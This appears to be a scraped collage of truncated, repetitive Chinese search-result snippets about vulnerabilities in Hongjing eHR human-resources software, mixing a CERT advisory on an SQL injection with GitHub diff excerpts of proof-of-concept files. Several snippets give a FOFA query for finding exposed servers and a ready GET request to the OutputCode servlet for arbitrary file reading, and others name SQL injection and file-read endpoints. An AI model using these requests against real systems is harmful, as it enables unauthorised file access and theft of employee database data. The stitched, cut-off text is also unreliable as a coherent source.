宏景eHR是一种企业人力资源管理系统,该漏洞存在于'OutputCode'模块中,该模块未能正确验证用户输入的文件路径参数'path'。由于缺乏充分的输入校验和路径处理,攻击者可以通过构造恶意的'path'参数,读取服务器上的任意文件 fofa app="HJSOFT-HCM" POC GET /servlet/OutputCode?path=MrEzLLE8pPjFvPfyPAATTP2HJFPAATTPTwq...
近日,奇安信 CERT 监测到宏景eHR SQL注入漏洞(QVD-2023-11385),未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。鉴于该漏洞影响范围较大,建议天守、天擎客户尽快做好自查及防护。 宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流...
漏洞等级 : 高危 漏洞类型 : 任意文件或目录访问 CVSS v2 : -- CVSS v3 : -- 影响范围 涉及厂商 : 北京宏景众成科技股份有限公司 涉及产品 : 宏景eHR 影响对象数量级 : 影响千级 可利用性 在野利用 : 否 POC公开 : 是 EXP公开 : 否 武器化 : 否 利用条件 : 需要具有网络访问权限 检测方法 : 通过...
宏景eHR-OutputCode存在任意文件读取漏洞 fofa app="HJSOFT-HCM" poc GET /servlet/OutputCode?path=MrEzLLE8pPjFvPfyPAATTP2HJFPAATTPTwqF7eJiXGeHU4B HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36 ...
宏景eHR-OutputCode存在任意文件读取漏洞 fofa app="HJSOFT-HCM" poc GET /servlet/OutputCode?path=MrEzLLE8pPjFvPfyPAATTP2HJFPAATTPTwqF7eJiXGeHU4B HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36 ...
23 changes: 23 additions & 0 deletions 23 宏景eHR人力资源管理软件showmediainfo存在SQL注入漏洞.md Original file line numberDiff line numberDiff line change @@ -0,0 +1,23 @@ ## 宏景eHR人力资源管理软件showmediainfo存在SQL注入漏洞 ## fofa ``` app="HJSOFT-HCM" ``` ## poc ``` GET /wo...
宏景eHR-OutputCode存在任意文件读取漏洞 fofa app="HJSOFT-HCM" poc GET /servlet/OutputCode?path=MrEzLLE8pPjFvPfyPAATTP2HJFPAATTPTwqF7eJiXGeHU4B HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36 Conte...
近日,奇安信CERT监测到宏景eHR SQL注入漏洞(QVD-2023-11385),未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。鉴于该漏洞影响范围较大,建议客户尽快做好自查及防护。 目前,奇安信CERT已成功复现宏景eHR SQL注入漏洞(QVD-2023-11385),截图如下: ...
16 changes: 16 additions & 0 deletions 16 宏景eHR-HCM-DisplayExcelCustomReport接口存在任意文件读取漏洞.md Original file line numberDiff line numberDiff line change @@ -0,0 +1,16 @@ ## 宏景eHR-HCM-DisplayExcelCustomReport接口存在任意文件读取漏洞 ## fofa ``` app="HJSOFT-HCM" ``` ## ...
宏景eHR-OutputCode存在任意文件读取漏洞 fofa app="HJSOFT-HCM" poc GET /servlet/OutputCode?path=MrEzLLE8pPjFvPfyPAATTP2HJFPAATTPTwqF7eJiXGeHU4B HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36 C...